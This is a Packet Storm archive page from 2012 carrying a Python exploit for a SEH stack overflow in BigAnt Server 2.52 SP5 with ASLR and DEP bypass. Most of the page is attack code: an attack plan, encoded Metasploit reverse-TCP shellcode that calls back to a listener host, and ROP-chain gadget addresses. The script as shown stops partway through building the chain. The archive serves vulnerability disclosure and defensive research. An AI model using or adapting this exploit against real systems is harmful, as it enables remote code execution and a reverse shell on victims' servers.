what you don't know can hurt you

BigAnt Server 2.52 Stack Overflow

BigAnt Server 2.52 Stack Overflow
Posted Nov 5, 2012
Authored by Lorenzo Cantoni

BigAnt Server version 2.52 SP5 SEH stack overflow ROP-based exploit with ASLR and DEP bypass.

tags | exploit, overflow
MD5 | eaa1f68cb8dc5ddd047cd3b4151c877d

BigAnt Server 2.52 Stack Overflow

Change Mirror Download
# Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)
# Date: 03/11/2012
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://www.bigantsoft.com/
# Version: BigAnt Console 2.52 SP5
# Tested on: Windows 7 SP0 x86 Italian - expsrv.dll (6.0.9589)
# Info: Vulnerability discovered by Lincoln: http://www.securityfocus.com/bid/37520/info


import socket
import sys

################
#Attack plan
#1) Overwrite SEH handler with a ROP Gadget that will move the stack pointer inside our buffer and continue the execution from there (ADD ESP,something + RETN should be ok)
#2) Execute the ROP Chain for a VirtualAlloc() and PUSHAD
#3) Run the shellcode
#4) Have fun :)
################


# Memory Layout

################
#
# Padding
#
################
#
# ROP-NOP Sled
#
################
#
# ROP Chain
#
################
#
# Padding
#
################
#
# NOP SLED
#
################
#
# Shellcode
#
################
#
# Padding
#
################
#
# SEH Overwite (Stack Pivot)
#
################
#
# Padding (may be useful for other shellcode?)
#
################



#From the original exploit, SEH will be overwritten after 966 bytes

target_address=sys.argv[1]
target_port=6660

#./msfpayload windows/shell/reverse_tcp EXITFUNC=thread LHOST=192.168.1.5 LPORT=4444 R | ./msfencode -a x86 -b "\x00\x0a\x0d\x20\x25" -t c
# size 317
shellcode = ("\xb8\xc0\xd7\xb6\x97\xdb\xd2\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x31\x45\x14\x03\x45\x14\x83\xc5\x04\x22\x22\x4a\x7f\x2b"
"\xcd\xb3\x80\x4b\x47\x56\xb1\x59\x33\x12\xe0\x6d\x37\x76\x09"
"\x06\x15\x63\x9a\x6a\xb2\x84\x2b\xc0\xe4\xab\xac\xe5\x28\x67"
"\x6e\x64\xd5\x7a\xa3\x46\xe4\xb4\xb6\x87\x21\xa8\x39\xd5\xfa"
"\xa6\xe8\xc9\x8f\xfb\x30\xe8\x5f\x70\x08\x92\xda\x47\xfd\x28"
"\xe4\x97\xae\x27\xae\x0f\xc4\x6f\x0f\x31\x09\x6c\x73\x78\x26"
"\x46\x07\x7b\xee\x97\xe8\x4d\xce\x7b\xd7\x61\xc3\x82\x1f\x45"
"\x3c\xf1\x6b\xb5\xc1\x01\xa8\xc7\x1d\x84\x2d\x6f\xd5\x3e\x96"
"\x91\x3a\xd8\x5d\x9d\xf7\xaf\x3a\x82\x06\x7c\x31\xbe\x83\x83"
"\x96\x36\xd7\xa7\x32\x12\x83\xc6\x63\xfe\x62\xf7\x74\xa6\xdb"
"\x5d\xfe\x45\x0f\xe7\x5d\x02\xfc\xd5\x5d\xd2\x6a\x6e\x2d\xe0"
"\x35\xc4\xb9\x48\xbd\xc2\x3e\xae\x94\xb2\xd1\x51\x17\xc2\xf8"
"\x95\x43\x92\x92\x3c\xec\x79\x63\xc0\x39\x2d\x33\x6e\x92\x8d"
"\xe3\xce\x42\x65\xee\xc0\xbd\x95\x11\x0b\xd6\x3f\xeb\xdc\x19"
"\x17\xf2\x19\xf2\x65\xf5\x30\x5e\xe0\x13\x58\x4e\xa4\x8c\xf5"
"\xf7\xed\x47\x67\xf7\x38\x22\xa7\x73\xce\xd2\x66\x74\xbb\xc0"
"\x1f\x74\xf6\xbb\xb6\x8b\x2d\xd1\x36\x1e\xc9\x70\x60\xb6\xd3"
"\xa5\x46\x19\x2c\x80\xdc\x90\xb8\x6b\x8b\xdc\x2c\x6c\x4b\x8b"
"\x26\x6c\x23\x6b\x12\x3f\x56\x74\x8f\x53\xcb\xe1\x2f\x02\xbf"
"\xa2\x47\xa8\xe6\x85\xc8\x53\xcd\x17\x35\x82\x28\x92\x4f\xa0"
"\x58\x5e")


# ROP Chain target
#
# EAX = NOP (0x90909090)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x1)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)

# we will ROP inside VBAJET32.DLL which is proprietary and an OS DLL, C:\Windows\system32\expsrv.dll


# ADJUST EDX AND EDI
ropchain = ''
for i in range(0,16): ropchain = ropchain + '\xc5\x86\x9e\x0f' #ADD EAX 100 - RETN # REPEAT 16 TIMES
ropchain = ropchain + '\x3c\xe4\x9e\x0f' # The next gadget point to the following
#0F9EE43C 8BD0 MOV EDX,EAX
#0F9EE43E 8D41 08 LEA EAX,DWORD PTR DS:[ECX+8]
#0F9EE441 C1E0 04 SHL EAX,4
#0F9EE444 2BC2 SUB EAX,EDX
#0F9EE446 5F POP EDI
#0F9EE447 5E POP ESI
#0F9EE448 5D POP EBP
#0F9EE449 5B POP EBX
#0F9EE44A C3 RETN

# According to my registers values, at pivoting time ECX+8 should point to a valid memory location so we go on

ropchain = ropchain + '\x9f\x18\x9a\x0f' # RETN POPPED IN EDI (ROP-NOP)
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP ESI
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP EBP
ropchain = ropchain + '\xff\xff\xff\xff' # will be popped in EBX (and incremented later)

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close